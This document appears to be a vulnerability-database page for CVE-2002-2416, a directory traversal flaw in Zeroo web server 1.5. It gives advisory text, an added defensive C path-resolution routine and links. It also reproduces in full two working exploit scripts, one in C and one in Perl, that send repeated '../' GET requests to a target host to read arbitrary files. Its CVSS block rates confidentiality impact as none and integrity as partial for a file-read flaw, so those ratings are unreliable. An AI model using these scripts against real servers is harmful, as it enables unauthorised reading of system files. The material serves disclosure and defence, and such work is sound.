CVE-2002-2416
CVSS 5.0
Published: 2002-12-31 00:00:00
Last revised: 2008-09-05 16:33:10

[Original] Directory traversal vulnerability in Zeroo web server 1.5 allows remote attackers to read arbitrary files via a .. (dot dot) in a URL GET request.


[CNNVD] Zeroo HTTP Server remote directory traversal vulnerability (CNNVD-200212-188)

        
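Zeroo HTTP Server is a simple, fast web server program.
Zeroo HTTP Server does not properly filter malicious web requests submitted by users. A remote attacker can exploit this vulnerability to view the contents of arbitrary files on the system with the privileges of the web process.
Because Zeroo does not properly filter web requests, an attacker can submit a web request containing multiple '../' sequences to the Zeroo service, bypass the web root directory restriction, and view the contents of arbitrary files on the system with the web server's privileges, resulting in disclosure of sensitive information.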
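
The missing check described above, shown as an added defensive example (this is not Zeroo's code and does not come from the advisory): a C routine that decodes the request path once, resolves it segment by segment, and refuses any request that would climb above the web root. The function names and the `/var/www` root used when calling it are assumptions made for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Decode %XX escapes in place; returns -1 on a malformed escape or %00. */
static int url_decode(char *s)
{
    char *out = s;
    for (; *s; s++) {
        if (*s != '%') { *out++ = *s; continue; }
        if (!isxdigit((unsigned char)s[1]) || !isxdigit((unsigned char)s[2]))
            return -1;
        char hex[3] = { s[1], s[2], 0 };
        long v = strtol(hex, NULL, 16);
        if (v == 0) return -1;              /* reject embedded NUL */
        *out++ = (char)v;
        s += 2;
    }
    *out = 0;
    return 0;
}

/* Map a request path onto `root` (hypothetical helper, root given without a
 * trailing slash). Returns 0 and fills `out`, or -1 if the path is malformed,
 * too long, or would climb above the web root. Uses strtok: not thread-safe. */
int resolve_request_path(const char *root, const char *uri, char *out, size_t outlen)
{
    char buf[1024];
    size_t n = strcspn(uri, "?#");          /* drop query string / fragment */
    if (uri[0] != '/' || n >= sizeof(buf)) return -1;
    memcpy(buf, uri, n); buf[n] = 0;
    if (url_decode(buf) != 0) return -1;    /* decode BEFORE looking for ".." */
    int len = snprintf(out, outlen, "%s", root);
    if (len < 0 || (size_t)len >= outlen) return -1;
    size_t base = (size_t)len, pos = base;
    for (char *seg = strtok(buf, "/\\"); seg; seg = strtok(NULL, "/\\")) {
        if (strcmp(seg, ".") == 0) continue;
        if (strcmp(seg, "..") == 0) {
            if (pos == base) return -1;     /* would leave the web root */
            while (out[--pos] != '/') ;     /* pop the last segment */
            out[pos] = 0;
            continue;
        }
        int w = snprintf(out + pos, outlen - pos, "/%s", seg);
        if (w < 0 || (size_t)w >= outlen - pos) return -1;
        pos += (size_t)w;
    }
    return 0;
}
```

The check is purely lexical; where symbolic links may exist under the web root, the resolved path should also be canonicalized with `realpath()` and compared against the root prefix before the file is opened.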
        

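- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on the confidentiality of the system]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: NONE [no impact on the availability of the system]
Attack complexity: LOW [no access restrictions for exploitation]
Attack vector: NETWORK [the attacker does not need intranet or local access]
Authentication: NONE [exploitation requires no authentication]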

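- CWE (weakness category)

CWE-22 [Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')]

- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2416
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-2416
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-188
(official data source) CNNVD

- Other links and resources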

http://www.securityfocus.com/bid/6308
(UNKNOWN)  BID  6308
http://www.iss.net/security_center/static/10672.php
(UNKNOWN)  XF  zeroo-dotdot-directory-traversal(10672)
http://cert.uni-stuttgart.de/archive/bugtraq/2002/11/msg00306.html
(UNKNOWN)  BUGTRAQ  20021122 Zeroo Folder Traversal Vulnerability
http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0083.html
(UNKNOWN)  VULNWATCH  20021121 Zeroo Folder Traversal Vulnerability

- Vulnerability information

Zeroo HTTP Server remote directory traversal vulnerability
Medium risk  Input validation
2002-12-31 00:00:00 2002-12-31 00:00:00
Remote
        
        

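- Advisories and patches

        Vendor patch:
        Zeroo
        -----
        The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:
        
        http://lonerunner.cfxweb.net/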

- Vulnerability information (22063)

Zeroo HTTP Server 1.5 Directory Traversal Vulnerability (1) (EDBID:22063)
linux remote
2002-11-22 Verified
0 mikecc
N/A
source: http://www.securityfocus.com/bid/6308/info

It has been reported that Zeroo fails to properly sanitize web requests. By sending a malicious web request to the vulnerable server, using directory traversal sequences, it is possible for a remote attacker to access sensitive resources located outside of the web root.

An attacker is able to traverse outside of the established web root by using dot-dot-slash (../) directory traversal sequences. An attacker may be able to obtain any web server readable files from outside of the web root directory.

/*
 * zeroo httpd remote directory traversal exploit
 * proof of concept
 *      hehe, just a copy and paste from my other directory
 *      traversal exploit ;p
 * [mikecc] [http://uc.zemos.net/]
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <unistd.h>

#define FOO "../"

void get(int sd);

int main(int argc, char **argv)
{
        struct sockaddr_in sock;
        struct hostent *pHe;
        int sd;
        int amt;
        char * host;
        char * file;
        short port;
        char expstr[1024];
        int x;
        char * baz;

        printf("UC-zeroo\n");
        printf("zeroo httpd remote exploit\n");
        printf("[mikecc/unixclan] [http://uc.zemos.net/]\n\n");
        if (argc != 5)
        {
                printf("%s host port file traverse_amount (>= 1 [keep incrementing till hit])\n",argv[0]);
                return 0;
        }
        host = argv[1];
        port = atoi(argv[2]);
        file = argv[3];
        amt = atoi(argv[4]);
        if ((pHe = gethostbyname(host)) == NULL)
        {
                printf("Host lookup error.\n");
                return 0;
        }
        if ((sd = socket(AF_INET,SOCK_STREAM,0)) == -1)
        {
                printf("sock() failed.\n");
                return 0;
        }
        sock.sin_family = AF_INET;
        sock.sin_port = htons(port);
        memcpy(&sock.sin_addr.s_addr,pHe->h_addr,pHe->h_length);
        printf("Connecting...\n");
        if ((connect(sd,(struct sockaddr *)&sock,sizeof(sock))) == -1)
        {
                printf("Failed to connect to %s.\n",host);
                return 0;
        }
        printf("Setting up exploit string..\n");
        if ((amt + 8 + strlen(file)) > 1024)
        {
                printf("Error. Limit 1024 characters.\n");
                return 0;
        }
        sprintf(expstr,"GET /");
        for (x = 0; x < amt; x++)
        {
                strcat(expstr,FOO);
        }
        printf("\tInserting file string..\n");
        strcat(expstr,file);
        strcat(expstr,"\n\n");
        printf("Sending exploit string...\n");
        write(sd,expstr,strlen(expstr));
        get(sd);
        close(sd);
        return 0;
}

void get(int sd)
{
        char buf[1024];
        int x;
        fd_set rset;

        FD_ZERO(&rset);
        while (1)
        {
                FD_SET(sd,&rset);
                select(sd+1,&rset,0,0,0);
                if (FD_ISSET(sd,&rset))
                {
                        if ((x = read(sd,buf,1024)) == 0)
                        {
                                printf("Connection closed by foreign host.\n");
                                exit(1);
                        }
                        buf[x] = 0; /* clean out junk */
                        printf("%s\n",buf);
                }
        }
}
		

- Vulnerability information (22064)

Zeroo HTTP Server 1.5 Directory Traversal Vulnerability (2) (EDBID:22064)
linux remote
2002-11-22 Verified
0 mattmurphy
N/A
source: http://www.securityfocus.com/bid/6308/info
 

#!/usr/bin/perl
use IO::Socket;
$pkt = "GET /../../../../../../../../../../../../../../../../../../../../%s
HTTP/1.0\r\n\r\n";
if (@ARGV < 2 || @ARGV > 3) {
print STDOUT "Usage: perl $0 [filename] [host] [port=80]";
exit;
}
if (@ARGV==3) {
$port=$ARGV[2];
} else {
$port=80;
}
$f = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$ARGV[1],PeerPort=>$port);
if (!defined($f)) {
$err=sprintf("Cannot connect to %s on port %d",$ARGV[1],$port);
print STDOUT $err;
exit;
}
$f->autoflush(1);
print $f $pkt;
while (defined($line = <$f>)) {
print STDOUT $line;
}
undef $f;		

- Vulnerability information

59170
Zeroo Web Server URI Traversal Arbitrary File Access
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality
Exploit Public Uncoordinated Disclosure

- Vulnerability description

- Timeline

2002-11-21 Unknown
2002-11-21 Unknown

- Solution

Products

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete
 

 
